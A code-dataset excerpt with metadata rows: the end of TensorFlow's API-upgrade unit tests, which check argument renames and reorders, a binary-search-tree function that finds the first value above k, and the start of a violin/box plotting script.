continue # These require manual change
if tf_name in v1_name_exceptions:
continue
# Assert that arg names after converting to v2 are present in
# v2 function.
# 1. First, create an input of the form:
# tf.foo(arg1=val1, arg2=val2, ...)
args = ",".join(
["%s=%d" % (from_name, from_index)
for from_index, from_name in enumerate(arg_names_v1)])
text_input = "%s(%s)" % (tf_name, args)
# 2. Convert the input to V2.
_, _, _, text = self._upgrade(text_input)
new_function_name, new_args = get_func_and_args_from_str(text)
if new_function_name == "tf.compat.v1.%s" % name:
if tf_name in keyword_renames:
# If we rename arguments, new function must be available in 2.0.
# We should not be using compat.v1 in this case.
self.assertFalse(
"Function '%s' is not in 2.0 when converting\n%s\nto\n%s" %
(new_function_name, text_input, text))
continue
# 3. Verify V2 function and arguments.
args_v2 = get_args(self.v2_symbols[new_function_name])
args_v2.extend(v2_arg_exceptions)
for new_arg in new_args:
self.assertIn(
new_arg, args_v2,
"Invalid argument '%s' in 2.0 when converting\n%s\nto\n%s.\n"
"Supported arguments: %s" % (
new_arg, text_input, text, str(args_v2)))
visitor = public_api.PublicAPIVisitor(conversion_visitor)
visitor.do_not_descend_map["tf"].append("contrib")
visitor.private_map["tf.compat"] = ["v1", "v2"]
traverse.traverse(tf.compat.v1, visitor)
def testReorderFileNeedsUpdate(self):
reordered_function_names = (
tf_upgrade_v2.TFAPIChangeSpec().reordered_function_names)
function_reorders = (
tf_upgrade_v2.TFAPIChangeSpec().function_reorders)
added_names_message = """Some function names in
self.reordered_function_names are not in reorders_v2.py.
Please run the following commands to update reorders_v2.py:
bazel build tensorflow/tools/compatibility/update:generate_v2_reorders_map
bazel-bin/tensorflow/tools/compatibility/update/generate_v2_reorders_map
"""
removed_names_message = """%s in self.reorders_v2 does not match
any name in self.reordered_function_names.
Please run the following commands to update reorders_v2.py:
bazel build tensorflow/tools/compatibility/update:generate_v2_reorders_map
bazel-bin/tensorflow/tools/compatibility/update/generate_v2_reorders_map
"""
self.assertTrue(
reordered_function_names.issubset(function_reorders),
added_names_message)
# function_reorders should contain reordered_function_names
# and their TensorFlow V1 aliases.
for name in function_reorders:
# get other names for this function
attr = get_symbol_for_name(tf.compat.v1, name)
_, attr = tf_decorator.unwrap(attr)
v1_names = tf_export.get_v1_names(attr)
self.assertTrue(v1_names)
v1_names = ["tf.%s" % n for n in v1_names]
# check if any other name is in
self.assertTrue(
any(n in reordered_function_names for n in v1_names),
removed_names_message % name)
def testRenameConstant(self):
text = "tf.MONOLITHIC_BUILD\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "tf.sysconfig.MONOLITHIC_BUILD\n")
text = "some_call(tf.MONOLITHIC_BUILD)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, "some_call(tf.sysconfig.MONOLITHIC_BUILD)\n")
def testRenameArgs(self):
text = ("tf.nn.pool(input_a, window_shape_a, pooling_type_a, padding_a, "
"dilation_rate_a, strides_a, name_a, data_format_a)\n")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text,
("tf.nn.pool(input=input_a, window_shape=window_shape_a,"
" pooling_type=pooling_type_a, padding=padding_a, "
"dilations=dilation_rate_a, strides=strides_a, "
"name=name_a, data_format=data_format_a)\n"))
def testReorder(self):
text = "tf.boolean_mask(a, b, c, d)\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text,
"tf.boolean_mask(tensor=a, mask=b, name=c, axis=d)\n")
def testLearningRateDecay(self):
for decay in ["tf.train.exponential_decay",
"tf.train.polynomial_decay", "tf.train.natural_exp_decay",
"tf.train.inverse_time_decay", "tf.train.cosine_decay",
"tf.train.cosine_decay_restarts",
"tf.train.linear_cosine_decay",
"tf.train.noisy_linear_cosine_decay"]:
text = "%s(a, b)\n" % decay
_, report, errors, _ = self._upgrade(text)
self.assertIn("%s requires manual check" % decay, errors[0])
self.assertIn("%s has been changed" % decay, report)
def testPiecewiseDecay(self):
text = "tf.train.piecewise_constant_decay(a, b)\n"
_, report, errors, _ = self._upgrade(text)
self.assertIn("tf.train.piecewise_constant_decay requires manual check",
errors[0])
self.assertIn("tf.train.piecewise_constant_decay has been changed", report)
def testMetrics(self):
metrics = [
"accuracy",
"auc",
"average_precision_at_k",
"false_negatives",
"false_negatives_at_thresholds",
"false_positives",
"false_positives_at_thresholds",
"mean",
"mean_absolute_error",
"mean_cosine_distance",
"mean_iou",
"mean_per_class_accuracy",
"mean_relative_error",
"mean_squared_error",
"mean_tensor",
"percentage_below",
"precision",
"precision_at_k",
"precision_at_thresholds",
"precision_at_top_k",
"recall",
"recall_at_k",
"recall_at_thresholds",
"recall_at_top_k",
"root_mean_squared_error",
"sensitivity_at_specificity",
"sparse_average_precision_at_k",
"sparse_precision_at_k",
"specificity_at_sensitivity",
"true_negatives",
"true_negatives_at_thresholds",
"true_positives",
"true_positives_at_thresholds",
]
for m in metrics:
ns = "tf.metrics." + m
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.compat.v1.metrics." + m + "(a, b)", new_text)
self.assertIn("test.py:1:0: %s requires manual check" % ns, errors[0])
self.assertIn(
"WARNING: tf.metrics have been converted to object oriented"
" versions in TF 2.0 and after. The metric function calls have been "
"converted to compat.v1 for backward compatibility. Please update "
"these calls to the TF 2.0 versions.", report)
def testLosses(self):
losses = [
"absolute_difference",
"add_loss",
"compute_weighted_loss",
"cosine_distance",
"get_losses",
"get_regularization_loss",
"get_regularization_losses",
"get_total_loss",
"hinge_loss",
"huber_loss",
"log_loss",
"mean_pairwise_squared_error",
"mean_squared_error",
"sigmoid_cross_entropy",
"softmax_cross_entropy",
"sparse_softmax_cross_entropy",
]
for l in losses:
ns = "tf.losses." + l
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.compat.v1.losses." + l + "(a, b)", new_text)
self.assertIn("test.py:1:0: %s requires manual check" % ns, errors[0])
self.assertIn(
"WARNING: tf.losses have been converted to object oriented"
" versions in TF 2.0 and after. The loss function calls have been "
"converted to compat.v1 for backward compatibility. Please update "
"these calls to the TF 2.0 versions.", report)
def testEstimatorLossReductionChange(self):
classes = [
"LinearClassifier", "LinearRegressor", "DNNLinearCombinedClassifier",
"DNNLinearCombinedRegressor", "DNNRegressor", "DNNClassifier",
"BaselineClassifier", "BaselineRegressor"
]
for c in classes:
ns = "tf.estimator." + c
text = ns + "(a, b)"
_, report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertIn("%s requires manual check" % ns, errors[0])
self.assertIn("loss_reduction has been changed", report)
def testDropout(self):
text = "tf.nn.dropout(x, keep_prob, name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, 1 - (keep_prob), name=\"foo\")\n",
)
text = "tf.nn.dropout(x, keep_prob=.4, name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, rate=1 - (.4), name=\"foo\")\n",
)
text = (
"tf.nn.dropout(x, # Stuff before\n"
" keep_prob=.4, # Stuff after\n"
" name=\"foo\")\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, # Stuff before\n"
" rate=1 - (.4), # Stuff after\n"
" name=\"foo\")\n",
)
text = "tf.nn.dropout(x)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(new_text, text)
self.assertIn("tf.nn.dropout called without arguments", errors[0])
def testDropoutExpr(self):
text = "tf.nn.dropout(x, 1 - func(3 + 4.), name=\"foo\")\n"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(
new_text,
"tf.nn.dropout(x, 1 - (1 - func(3 + 4.)), name=\"foo\")\n",
)
def testMathCountNonZeroChanges(self):
text = (
"tf.math.count_nonzero(input_tensor=input, dtype=dtype, name=name, "
"reduction_indices=axis, keep_dims=keepdims)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.math.count_nonzero(input=input, dtype=dtype, name=name, "
"axis=axis, keepdims=keepdims)\n"
)
self.assertEqual(new_text, expected_text)
def testCountNonZeroChanges(self):
text = (
"tf.count_nonzero(input_tensor=input, dtype=dtype, name=name, "
"reduction_indices=axis, keep_dims=keepdims)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.math.count_nonzero(input=input, dtype=dtype, name=name, "
"axis=axis, keepdims=keepdims)\n"
)
self.assertEqual(new_text, expected_text)
def testRandomMultinomialToRandomCategorical(self):
text = (
"tf.random.multinomial(logits, samples, seed, name, output_dtype)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.random.categorical(logits=logits, num_samples=samples, seed=seed, "
"name=name, dtype=output_dtype)\n"
)
self.assertEqual(new_text, expected_text)
text = (
"tf.multinomial(logits, samples, seed, name, output_dtype)\n"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.random.categorical(logits=logits, num_samples=samples, seed=seed, "
"name=name, dtype=output_dtype)\n"
)
self.assertEqual(new_text, expected_text)
def testRandomPoissonConversion(self):
text1 = "tf.random_poisson(lam, shape, dtype)"
text2 = "tf.random.poisson(lam, shape, dtype)"
expected_text = "tf.random.poisson(lam=lam, shape=shape, dtype=dtype)"
_, unused_report, unused_errors, new_text1 = self._upgrade(text1)
self.assertEqual(new_text1, expected_text)
_, unused_report, unused_errors, new_text2 = self._upgrade(text2)
self.assertEqual(new_text2, expected_text)
def testConvolutionOpUpdate(self):
text = (
"tf.nn.convolution(input, filter, padding, strides, dilation_rate, "
"name, data_format)"
)
_, unused_report, unused_errors, new_text = self._upgrade(text)
expected_text = (
"tf.nn.convolution(input=input, filters=filter, padding=padding, "
"strides=strides, dilations=dilation_rate, name=name, "
"data_format=data_format)"
)
self.assertEqual(new_text, expected_text)
def test_substr(self):
text = "tf.substr(input, pos, len, name, unit)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.strings.substr(input=input, pos=pos, len=len, "
"name=name, unit=unit)\n", new_text)
self.assertEqual(errors, [])
def testColocateGradientsWithOps(self):
text = "tf.gradients(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "tf.gradients(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("tf.gradients(a)\n", new_text)
self.assertIn("tf.gradients", errors[0])
self.assertIn("requires manual check", errors[0])
def testColocateGradientsWithOpsMinimize(self):
text = "optimizer.minimize(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "optimizer.minimize(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("optimizer.minimize(a)\n", new_text)
self.assertIn("requires manual check", errors[0])
self.assertIn("minimize", errors[0])
def testColocateGradientsWithOpsComputeGradients(self):
text = "optimizer.compute_gradients(a, foo=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(text, new_text)
self.assertEqual(errors, [])
text = "optimizer.compute_gradients(a, colocate_gradients_with_ops=False)\n"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual("optimizer.compute_gradients(a)\n", new_text)
self.assertIn("requires manual check", errors[0])
self.assertIn("compute_gradients", errors[0])
def testExportSavedModelRename(self):
text = "self.est.export_savedmodel(path)"
_, report, unused_errors, unused_new_text = self._upgrade(text)
self.assertIn(
"rename the method export_savedmodel() to export_saved_model()",
report)
def testArgmin(self):
text = "tf.argmin(input, name=n, dimension=1, output_type=type)"
expected_text = "tf.argmin(input=input, name=n, axis=1, output_type=type)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.argmin(input, 0)"
expected_text = "tf.argmin(input=input, axis=0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.arg_min(input, 0)"
expected_text = "tf.argmin(input, 0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testArgmax(self):
text = "tf.argmax(input, name=n, dimension=1, output_type=type)"
expected_text = "tf.argmax(input=input, name=n, axis=1, output_type=type)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.argmax(input, 0)"
expected_text = "tf.argmax(input=input, axis=0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.arg_max(input, 0)"
expected_text = "tf.argmax(input, 0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEstimatorInputs(self):
text = "tf.estimator.inputs.numpy_input_fn(0)"
expected_text = "tf.compat.v1.estimator.inputs.numpy_input_fn(0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.estimator.inputs.pandas_input_fn(0)"
expected_text = "tf.compat.v1.estimator.inputs.pandas_input_fn(0)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testBatchToSpace(self):
text = "tf.batch_to_space_nd(input, block_shape, crops, name)"
expected_text = "tf.batch_to_space(input, block_shape, crops, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.batch_to_space(input, crops, block_size, name)"
expected_text = (
"tf.batch_to_space(input=input, crops=crops, block_shape=block_size, "
"name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.manip.batch_to_space_nd(input, block_shape, crops, name)"
expected_text = "tf.batch_to_space(input, block_shape, crops, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testExtractImagePatches(self):
text = (
"tf.extract_image_patches(images, ksizes=ksizes, strides=strides,"
"rates=rates, padding=padding, name=name)")
expected_text = (
"tf.image.extract_image_patches(images, sizes=ksizes, strides=strides,"
"rates=rates, padding=padding, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testStatelessMultinomial(self):
text = (
"tf.random.stateless_multinomial(logits, num_samples, seed, "
"output_dtype=dtype, name=name)")
expected_text = (
"tf.random.stateless_categorical(logits, num_samples, seed, "
"dtype=dtype, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSoftMaxCrossEntropyWithLogitsV2(self):
text = (
"tf.nn.softmax_cross_entropy_with_logits_v2("
"labels=labels, logits=logits, dim=2)")
expected_text = (
"tf.nn.softmax_cross_entropy_with_logits("
"labels=labels, logits=logits, axis=2)")
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
self.assertFalse(errors)
def testSoftMaxCrossEntropyWithLogits(self):
text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=labels, logits=logits, dim=2)")
expected_text = (
"tf.nn.softmax_cross_entropy_with_logits("
"labels=tf.stop_gradient(labels), logits=logits, axis=2)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=foo(bar))")
expected_text = ("tf.nn.softmax_cross_entropy_with_logits("
"labels=tf.stop_gradient(foo(bar)))")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testSparseMatmul(self):
text = ("tf.sparse_matmul(a, b, c, d, e, f, g)\n")
expected_text = ("tf.linalg.matmul(a=a, b=b, transpose_a=c, transpose_b=d, "
"a_is_sparse=e, b_is_sparse=f, name=g)\n")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testWeightedMoments(self):
text = "tf.nn.weighted_moments(x, axes, freq, name, kd)"
expected_text = (
"tf.nn.weighted_moments(x=x, axes=axes, frequency_weights=freq, "
"name=name, keepdims=kd)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSparseAdd(self):
text = "tf.sparse.add(a, b, t)"
expected_text = "tf.sparse.add(a=a, b=b, threshold=t)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSparseConcat(self):
text = "tf.sparse.concat(ax, inp, name, exp, concat)"
expected_text = (
"tf.sparse.concat(axis=ax, sp_inputs=inp, name=name, "
"expand_nonconcat_dims=exp, axis=concat)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSeparableConv2D(self):
text = "tf.nn.separable_conv2d(inp, d, pt, strides, pad, rate, name, fmt)"
expected_text = (
"tf.nn.separable_conv2d(input=inp, depthwise_filter=d, "
"pointwise_filter=pt, strides=strides, padding=pad, "
"dilations=rate, name=name, data_format=fmt)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSpacetoBatch(self):
text = "tf.space_to_batch_nd(input, shape, paddings, name)"
expected_text = "tf.space_to_batch(input, shape, paddings, name)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = "tf.nn.space_to_batch(input, paddings, block_size, name)"
expected_text = (
"tf.space_to_batch(input=input, paddings=paddings, "
"block_shape=block_size, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testInTopK(self):
text = "tf.math.in_top_k(a, b, c, n)"
expected_text = (
"tf.math.in_top_k(predictions=a, targets=b, k=c, name=n)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testDepthToSpace(self):
text = "tf.nn.depth_to_space(input, block_size, name, data_format)"
expected_text = (
"tf.nn.depth_to_space(input=input, block_size=block_size, "
"name=name, data_format=data_format)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEmbeddingLookup(self):
text = ("tf.nn.embedding_lookup(params, ids, partition_strategy, name, "
"validate_indices, max_norm)")
expected_text = ("tf.nn.embedding_lookup(params=params, ids=ids, "
"partition_strategy=partition_strategy, name=name, "
"validate_indices=validate_indices, max_norm=max_norm)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testEmbeddingLookupSparse(self):
text = ("tf.nn.embedding_lookup_sparse(params, sp_ids, sp_weights, "
"partition_strategy, name, combiner, max_norm)")
expected_text = ("tf.nn.embedding_lookup_sparse(params=params, "
"sp_ids=sp_ids, sp_weights=sp_weights, "
"partition_strategy=partition_strategy, name=name, "
"combiner=combiner, max_norm=max_norm)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testNnInTopK(self):
text = "tf.nn.in_top_k(predictions, targets, k, name)"
expected_text = ("tf.nn.in_top_k(predictions=predictions, "
"targets=targets, k=k, name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testSpaceToDepth(self):
text = "tf.nn.space_to_depth(input, block_size, name, data_format)"
expected_text = ("tf.nn.space_to_depth(input=input, block_size=block_size, "
"name=name, data_format=data_format)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testPrint(self):
# tf.print() cannot be parsed unless we import print_function
text = """from __future__ import print_function
tf.print()
tf.print('abc')
"""
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, text) # Text should stay the same
def testSparseSplit(self):
text = (
"tf.sparse_split(sp_input=sp_input, num_split=num_split, axis=axis, "
"name=name)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, axis=axis, "
"name=name)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = (
"tf.sparse_split(sp_input=sp_input, num_split=num_split, "
"name=name, split_dim=axis)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, axis=axis)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, split_dim=axis)")
expected_text = (
"tf.sparse.split(sp_input=sp_input, num_split=num_split, "
"name=name, axis=axis)")
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(new_text, expected_text)
def testBatchGather(self):
text = "tf.batch_gather(foo, bar)"
expected_text1 = "tf.gather(params=foo, indices=bar, batch_dims=-1)"
expected_text2 = "tf.gather(batch_dims=-1, params=foo, indices=bar)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertIn(new_text, [expected_text1, expected_text2])
text = "tf.batch_gather(params=foo, indices=bar)"
expected_text1 = "tf.gather(params=foo, indices=bar, batch_dims=-1)"
expected_text2 = "tf.gather(batch_dims=-1, params=foo, indices=bar)"
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertIn(new_text, [expected_text1, expected_text2])
def testCast(self):
for (name, dtype) in [("int32", "int32"),
("int64", "int64"),
("float", "float32"),
("double", "float64"),
("complex64", "complex64"),
("complex128", "complex128"),
("bfloat16", "bfloat16")]:
text = "tf.to_%s(x, name='test')" % name
expected_text = "tf.cast(x, name='test', dtype=tf.%s)" % dtype
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testCastPositionalSecondArgument(self):
for (name, dtype) in [("int32", "int32"),
("int64", "int64"),
("float", "float32"),
("double", "float64"),
("complex64", "complex64"),
("complex128", "complex128"),
("bfloat16", "bfloat16")]:
text = "tf.to_%s(x, 'test')" % name
expected_text = "tf.cast(x, name='test', dtype=tf.%s)" % dtype
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testImageResize(self):
for method in ["bilinear", "area", "bicubic", "nearest_neighbor"]:
text = "tf.image.resize_%s(i, s)" % method
expected_text = ("tf.image.resize(i, s, "
"method=tf.image.ResizeMethod.%s)" % method.upper())
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testImageResizeExtraPositionalArgs(self):
for method in ["bilinear", "area", "bicubic", "nearest_neighbor"]:
text = "tf.image.resize_%s(i, s, a, p)" % method
expected_text = ["tf.image.resize(i, s, ", "align_corners=a, ",
"preserve_aspect_ratio=p, ",
"method=tf.image.ResizeMethod.%s)" % method.upper()]
_, unused_report, unused_errors, new_text = self._upgrade(text)
for s in expected_text:
self.assertIn(s, new_text)
def testCond(self):
text = "tf.cond(a, b, c, True)"
expected_text = "tf.cond(pred=a, true_fn=b, false_fn=c)"
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("tf.cond", errors[0])
self.assertIn("requires manual check", errors[0])
def testParens(self):
text = """
def _log_prob(self, x):
return tf.reduce_logsumexp(
(self.mixture_distribution.logits + self.distribution.log_prob(
x[..., tf.newaxis])),
axis=-1)"""
expected_text = """
def _log_prob(self, x):
return tf.reduce_logsumexp(
input_tensor=(self.mixture_distribution.logits + self.distribution.log_prob(
x[..., tf.newaxis])),
axis=-1)"""
_, unused_report, unused_errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
def testAssertStatements(self):
for name in ["assert_greater", "assert_equal", "assert_none_equal",
"assert_less", "assert_negative", "assert_positive",
"assert_non_negative", "assert_non_positive", "assert_near",
"assert_less", "assert_less_equal", "assert_greater",
"assert_greater_equal", "assert_integer", "assert_type",
"assert_scalar"]:
text = "tf.%s(a)" % name
expected_text = "tf.compat.v1.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_* functions", errors[0])
text = "tf.debugging.%s(a)" % name
expected_text = "tf.compat.v1.debugging.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_* functions", errors[0])
def testAssertRankStatements(self):
for name in ["assert_rank", "assert_rank_at_least", "assert_rank_in"]:
text = "tf.%s(a)" % name
expected_text = "tf.compat.v1.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_rank_* functions", errors[0])
text = "tf.debugging.%s(a)" % name
expected_text = "tf.compat.v1.debugging.%s(a)" % name
_, unused_report, errors, new_text = self._upgrade(text)
self.assertEqual(expected_text, new_text)
self.assertIn("assert_rank_* functions", errors[0])
class TestUpgradeFiles(test_util.TensorFlowTestCase):
def testInplace(self):
"""Check to make sure we don't have a file system race."""
temp_file = tempfile.NamedTemporaryFile("w", delete=False)
original = "tf.conj(a)\n"
upgraded = "tf.math.conj(a)\n"
temp_file.write(original)
temp_file.close()
upgrader = ast_edits.ASTCodeUpgrader(tf_upgrade_v2.TFAPIChangeSpec())
upgrader.process_file(temp_file.name, temp_file.name)
self.assertAllEqual(open(temp_file.name).read(), upgraded)
os.unlink(temp_file.name)
if __name__ == "__main__":
test_lib.main()
|
[
"[email protected]"
] | |
b8b3aa3da22010a0dbb13fa9eae2bcadfe7846f4
|
636411baa2fc5b5c81710b37d6c53fa7076b9026
|
/BST/find_first_greater_than_k.py
|
12b3afc941d7a7ff0be4c0c824ceb1a71ea54c17
|
[] |
no_license
|
tberhanu/elts-of-coding
|
9d90fb23db829c1b41782e2f96978ea9bde59484
|
f17881c5732853935bc36b93d00ff58e7f759ed6
|
refs/heads/master
| 2023-01-04T13:28:31.315542 | 2020-10-30T01:24:48 | 2020-10-30T01:24:48 | 297,862,717 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,369 |
py
|
from BST.detail_note import BSTNode
from BST import is_binary_tree_bst
from BST import sample_bst
def find_first_greater_than_k(tree, k):
"""
Given a BST TREE and value K, return the closest number that is greater than K from the BST.
Strategy:
If the node value is less than k, COMPLETELY IGNORE IT, and continue searching to the RIGHT, but
if the node value is greater than k, that is a POSSIBLE CANDIDATE, so save that SUBTREE or VALUE,
and keep searching to the LEFT in case you get another node with value greater than k but less
than the previously saved node value, which means if we get another value greater than K but more
closer to K.
Time: O(H) where H is the BST tree height, O(log N).
Space: O(1)
"""
best_value_so_far = None
while tree:
if tree.data > k:
best_value_so_far = tree.data
tree = tree.left
else:
tree = tree.right
return best_value_so_far
if __name__ == "__main__":
bst = BSTNode(990, BSTNode(200, BSTNode(188), BSTNode(299)), BSTNode(1000, BSTNode(999), BSTNode(1001)))
print(is_binary_tree_bst.is_binary_tree_bst(bst))
result = find_first_greater_than_k(bst, 299)
print(result)
print(is_binary_tree_bst.is_binary_tree_bst(sample_bst))
print(find_first_greater_than_k(sample_bst, 99))
|
[
"[email protected]"
] | |
fae6ad0a1904c63b3c6215ee5cbc6c8ed4b3541e
|
e51440020cebb432e0ce1f951c9c5700ebfb900c
|
/plotViolinBox.py
|
65eceb9219f2503ee3c3d76173fc5db238c7988c
|
[
"MIT"
] |
permissive
|
albertwcheng/albert-bioinformatics-scripts
|
f592f229fc69ff3798cbe4b630e47a48f7dbaa68
|
cbe2a5088f069ee9f64c8c006b08dbef98585ba0
|
refs/heads/master
| 2022-05-26T17:57:00.929988 | 2022-04-18T22:09:57 | 2022-04-18T22:09:57 | 1,090,901 | 2 | 2 | null | null | null | null |
UTF-8
|
Python
| false | false | 37,933 |
py
|
#!/usr/bin/env python
import warnings
warnings.filterwarnings("ignore")
#derived from plotExpBox2.py
'''
Copyright 2010 Wu Albert Cheng <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
'''
from pylab import *
from sys import stderr,stdout,argv
from getopt import getopt
import sys
from albertcommon import *
from welchttest import welchs_approximate_ttest_arr
from scipy.stats.stats import ttest_ind,ttest_1samp,mannwhitneyu
from scipy.stats import wilcoxon,ansari,fligner,levene,bartlett
from glob import glob
from random import *
from PZFXMaker import *
from scipy.stats import gaussian_kde,histogram
from numpy import arange
import traceback
import numpy
from math import log
def divideDataPerCols(data,thresholds): # [||]
dividedDataMain=[]
lent=len(thresholds)
for i in range(0,lent+1):
dividedDataMain.append([])
for i in range(0,len(data)): #go thru the columns
curCol=data[i]
for j in range(0,len(thresholds)+1):
dividedDataMain[j].append([])
for x in curCol:
#now classifies
k=-1
if x<thresholds[0]:
k=0
elif x>=thresholds[lent-1]:
k=lent
else:
for j in range(0,lent-1):
if x>=thresholds[j] and x<thresholds[j+1]:
k=j+1
dividedDataMain[k][i].append(x)
return dividedDataMain
def plotExpBox(data,xtickLabels,showIndPoints,mark,markMean,showMean,notch,whisker,outliers,xlegendrotation,xlabe,ylabe,titl,showSampleSizes,showViolin,showBox,annot,trendData,plotItemLegend,makePzfxFile,makeBinMatrix,dividePlots):
#fig=plt.figure()
